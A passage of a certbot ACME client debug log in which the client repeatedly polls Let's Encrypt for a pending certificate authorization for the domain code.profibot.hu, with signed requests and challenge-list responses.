'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:30,802:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:30,806:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT3pzcGVIS1lwVlpGRGZERTJxU3hQdW44TTBlZi05Zkc5djNqTGhabDlvNXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "gY9qNcSPeXBhp2XhJe1XlZTR8ajwzVt9gVC8YvhPnHoc1JpzryRTozd-fAH3HaBQxJQ9lOTockECFCtTaR00UofbTzbloPI45ApifB1ArlYyNbqduPrNdI1HGSXcVCZee0p9NFT-pUZT1GhhDvIhBCFTSi3ZraTF0bSyl9QLtFTFhtRM6vbYCas0edXoNsqSQEMYJ8x24_X2axYLy5VEygcWsQKmcnHU0L1_ROCthZcLTF_iEZLy0gL7k2b__Ji9l7cGLOJcUGboCzmI9wSB8bHX1aid2r_x_y9D6tVWDCPTqLEVd1oBeVlqFOzj-J6jjiVtNZkRIF2tNQgCmqWp1g", + "payload": "" +} +2026-01-19 23:23:30,951:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:30,951:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:30 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyAxHxsu0LOdy1fWMzgrzMXj0EouKxdoDlZScE8If5zvE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:30,951:DEBUG:acme.client:Storing nonce: H6cLU6QyAxHxsu0LOdy1fWMzgrzMXj0EouKxdoDlZScE8If5zvE +2026-01-19 23:23:30,952:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:33,952:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:33,956:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReUF4SHhzdTBMT2R5MWZXTXpncnpNWGowRW91S3hkb0RsWlNjRThJZjV6dkUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "jUqfXak1rcS9J2GNzN7S5Ia1V-ER6vLOTYfp07zOYV5wdesRgrLl6cbGteFe37eHDlWDOotKzaUeNaTmVl8ehDKLKs6X7K361RFUvlOd8msfpPQl1xDWuGnGQLd-dpMT28fJrVsgwRpbl-WAqfBouOZkJy4QEnr3AxXx8DPpjW2tIkwz3668VYAI-ITyR6qyTj1vbdbeioDu-7ogvxMx1gzQaDc87jKjjvksL5lf1JRMb74GIIjwK-3EO2522eXFNmPTFWPmT0R_KRk4eDp100Cx38dF-8goob044DuJKBL5Z9MFWXPHQiYF3KMIdUEW0htXg0WIIxsORsRNa5Xzhg", + "payload": "" +} +2026-01-19 23:23:34,102:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:34,103:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:34 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6Qy1Dtab6AzLuAg6yB3vYePadKMPn2SxJ3_j4b888pnocI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:34,103:DEBUG:acme.client:Storing nonce: H6cLU6Qy1Dtab6AzLuAg6yB3vYePadKMPn2SxJ3_j4b888pnocI +2026-01-19 23:23:34,104:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:37,105:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:37,109:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReTFEdGFiNkF6THVBZzZ5QjN2WWVQYWRLTVBuMlN4SjNfajRiODg4cG5vY0kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "bjRRmgwo8S2L4Gvxlf-z4waBSLIf6UkvPfwp8jEUgxrChIcy3IygmrD9-LJqPHrtfJGO15QdHAL24VuOODUOTEheGMhsHJWPgwtLBX39rMSiQQiCFd_yv-95Y-c4fmm4GMBOOnCVL9xo373-UESpnHm3ZFN2Vot5PCKRwO8Y4VmYCrfY_o_uMO8h02eZLVgWP7gy81D9RTnBtAYRCqv4yULt3llRbpKKlTdtLhKeJaVxb1rDfs3iSCB4wC_lfnJ1Sc-4R928CZ0OlwTemsYrtWv6h_al4ZRsIIXkh2J8xkj-WjfFsGGXF5-o3lqd4uk3-r6e_FKI8t6F1sABsdVNGA", + "payload": "" +} +2026-01-19 23:23:37,302:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:37,303:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:37 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOyVJ9aTSmDZZyWqRglWV22cYf98Q0g9uQPNG7Qcdt05A +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:37,303:DEBUG:acme.client:Storing nonce: LJ8hB_GOyVJ9aTSmDZZyWqRglWV22cYf98Q0g9uQPNG7Qcdt05A +2026-01-19 23:23:37,304:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:40,305:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:40,308:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT3lWSjlhVFNtRFpaeVdxUmdsV1YyMmNZZjk4UTBnOXVRUE5HN1FjZHQwNUEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "lwTh31P1OxMG9rIgQgXE4SX7UnCuLttaaCNuAjIrGtMfSs1Ad9NRDZmVeRB8gmAL9NSvCoJ6foWJpqksYiuzGm46xIMlLIAFPYC4UP-VEjP2KGq0sSWKkhziYzxmzj6hFp3k5vtc7LSWSJG6REIT_2bJY5mYC1p4zn0qi414y9-2k5eTE3qiDgOxYxcRrxusQTHUDhwMthO9tmxN8oNsvIIlO6C25kK0ULWNjVLdCZcGaLkz_lJAW5Fs-SRqxX2DPzbekADKylLh_7f2maOExphBkCZoQwb-EmJogb7KWZyhME5U2HjveEMqY9C6Ma_grSqrCncq5jUMjicQKIe_tg", + "payload": "" +} +2026-01-19 23:23:40,478:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:40,479:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:40 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QypbTOnHfUldamOCal40Up8OE-WOtC4NpjB7T5Q71xsd4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:40,480:DEBUG:acme.client:Storing nonce: H6cLU6QypbTOnHfUldamOCal40Up8OE-WOtC4NpjB7T5Q71xsd4 +2026-01-19 23:23:40,480:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:43,481:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:43,485:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReXBiVE9uSGZVbGRhbU9DYWw0MFVwOE9FLVdPdEM0TnBqQjdUNVE3MXhzZDQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "dOxDIiiCZ3DdovX_8JvKFOfDlKcxlEqpDoYBcrjQMsqIRj-iUhm6ZqGxHEFPClYAoFKaZ_9nrPDPJEncHDfAg2i79CawippOFTA0hI5pSn9QAnpcuylDJSMGM84cwy8cjqrhejzYIb2OOstqGITLf4ycdV25_FdY0Yc7d4vxgVmDD_cOjmfQysIfmdoHAp_HqHPZJg76hoZakdVRsQMIeDgwU2uGiMUFmQGoR5SfadO39toSlXUBs_69Q9FBi8_rpT1ZL31TPMQs3sg3d8E6Ffd1AJeRj8W6BuG1t4kD_bW4m6JB-KAnnxI4O4NzNboq6HYwtT_X0AXmYmfuy3esrw", + "payload": "" +} +2026-01-19 23:23:43,629:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:43,630:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:43 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOcu6hsc12aNy5ILMREWhD9qZHHX8WwYbLjorJoyNfLDE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:43,631:DEBUG:acme.client:Storing nonce: LJ8hB_GOcu6hsc12aNy5ILMREWhD9qZHHX8WwYbLjorJoyNfLDE +2026-01-19 23:23:43,631:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:46,632:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:46,636:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT2N1NmhzYzEyYU55NUlMTVJFV2hEOXFaSEhYOFd3WWJMam9ySm95TmZMREUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "VDw0aUHOhtmrIbTrr7c1ogZhe3QDJVC-19ElEn2C8uN_yGzauwA065017BtbKDI_tjJIPDjWU2uD_9GUb3VayojujNNtFDPJAl7cGhvrUv4WQ_sWx4MmQkTRJ3J5-MBv4rZixcMQ9cLGSluJE7aT6GmSFaT-vq0FtK7OsdNYGrUvzeHyqu2fXhyYVGVPh44BjhfSioy1mKyMSNZG2Gn1ngCp9uPVIBW9UEmFpXxGGr5LSHUrllIR-F95ZaQuy9TG2HAAZwNhuxIXc8RxQSJfBRpHw5lb8I7V6rmLgGX279GbpCNNwDsxB9p3Ybe3HsumbsMRD3n3GRhIDKn_eOYtfA", + "payload": "" +} +2026-01-19 23:23:46,782:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:46,783:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:46 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyoMtUjE7tOnjoecsUxv5Rg0YJtClvAZhzaNmIgXgYXjw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:46,783:DEBUG:acme.client:Storing nonce: H6cLU6QyoMtUjE7tOnjoecsUxv5Rg0YJtClvAZhzaNmIgXgYXjw +2026-01-19 23:23:46,784:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:49,785:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:49,789:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReW9NdFVqRTd0T25qb2Vjc1V4djVSZzBZSnRDbHZBWmh6YU5tSWdYZ1lYanciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "E8nLRr43T3Ca5LmO0QkJ0bWNI2KCmm62HBIqGbD2HVjrvflsntYqb9qnKttNLKNFEVUKTl_xkcBxys_TbEJvPlbk8RtjZyjd2aj4MCqVC4_PQyqId5olqpI3khSRNkNl8p-UoMj8myYFYhWJS6HgZw4D4SDs8TbNhWkELhPYpFqHNXoX-l4O8poiTnhyGcLvwQHpjbJCaweNkNVrUULwDnNhJgi4TW0kfyTcK656VvjdB-dEeIzmG26pekxS-RX_Y8fmxBswc8-a2dgyn3Kw1odZaQg6u6tyGnNKNNlxQ_z8vuYL2iAbvs-6JKr1mxJYydQH0-5YcOSFyWZ73weRcw", + "payload": "" +} +2026-01-19 23:23:49,934:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:49,934:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:49 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyppnRkPpAGyUAhYt6jmIXL1kLJscsr6c8mH86ja09OGY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:49,935:DEBUG:acme.client:Storing nonce: H6cLU6QyppnRkPpAGyUAhYt6jmIXL1kLJscsr6c8mH86ja09OGY +2026-01-19 23:23:49,935:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:52,936:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:52,939:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReXBwblJrUHBBR3lVQWhZdDZqbUlYTDFrTEpzY3NyNmM4bUg4NmphMDlPR1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "P6XlccrLdjqKpjDk71gRl5Vyh6tiiLyN2Nnn6uvZeS68Xy0xMD2oWzhW9FJ5b7VHxlXH2RiWYjp_NgcJW_ZwinWTwIZH6dmukLiWbyce8IC-k0DyAwbmGMqsi8IiI5c-_q6f_Hr7gJlzFk7GWF5-5vEtp3-01xF35lTk5YzM5W8XALwsu1UvSWGDia9gwiRCMuB8EhV9xwCVGYifv1CY-i3bllWQNPQ2XoXjS2a2F2mSMjupA4VYD1dfyqTHo1eF-ZXDiE-q8OEB-pnJFOAQkk8O09rxYg1uyH4rMW5I_2GnB6lkYkn4GeCypMxSytS2D7wgGNfV_6b6tPX7hCOMtA", + "payload": "" +} +2026-01-19 23:23:53,095:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:53,096:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:53 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOwCvmTpWDb8XFDrwkYJ6xHKU1jCKmoBHgOf2WWkQcfHE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:53,097:DEBUG:acme.client:Storing nonce: LJ8hB_GOwCvmTpWDb8XFDrwkYJ6xHKU1jCKmoBHgOf2WWkQcfHE +2026-01-19 23:23:53,097:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:56,098:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:56,102:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT3dDdm1UcFdEYjhYRkRyd2tZSjZ4SEtVMWpDS21vQkhnT2YyV1drUWNmSEUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "Wefm4LG9_XBzBe2HIk0FD7Zq4GJnv6G9e38ShuS_IrCGfvK-IyiFNp02Blc15BYVAhkyHevIq0mrbud07PlG2LW4Q8P4fJ9TQgGj1gP6SXCtQWj4jpRmPG2Xry9ad3Qbqzui7wFML4xDPOcWT1HzDMWFN3lYtR36M8xLl1p2eVmQOj59g4UCVxGdYC2qpmt-qKFjw7C_PBPGpYcoIGSOFG7A463pnkwhjJVFqCtnHYG9dnIbjqu76DJ4OOKwRkzmrKvwIZf6RET3Jbl08kB5-HWGnWwX2bYlvHD_CdTPn8mgwsg2io0FJup7RlyFsJTTD-cWIlNWyOp_cbZ8BhMbmw", + "payload": "" +} +2026-01-19 23:23:56,248:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 